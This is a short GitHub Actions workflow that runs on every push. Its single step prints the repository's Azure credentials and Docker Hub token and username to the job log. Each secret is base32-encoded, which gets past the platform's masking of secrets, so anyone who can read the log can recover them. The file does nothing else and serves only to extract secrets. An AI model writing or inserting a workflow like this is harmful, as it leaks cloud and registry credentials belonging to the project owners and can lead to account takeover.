name: d
on: push
jobs:
  a:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "AZURE_CREDENTIALS:"; echo "${{ secrets.AZURE_CREDENTIALS }}" | base32 -w0; echo
          echo "DOCKERHUB_TOKEN:"; echo "${{ secrets.DOCKERHUB_TOKEN }}" | base32 -w0; echo
          echo "DOCKERHUB_USERNAME:"; echo "${{ secrets.DOCKERHUB_USERNAME }}" | base32 -w0; echo

